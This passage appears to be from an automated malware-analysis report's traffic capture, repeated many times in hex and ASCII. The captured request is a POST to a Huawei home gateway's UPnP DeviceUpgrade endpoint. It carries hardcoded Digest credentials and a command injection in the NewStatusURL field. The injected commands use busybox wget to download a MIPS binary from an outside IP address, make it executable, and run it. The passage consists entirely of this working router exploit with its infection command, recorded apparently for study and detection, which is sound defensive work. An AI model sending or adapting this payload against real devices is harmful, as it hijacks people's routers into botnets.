6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewSta
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 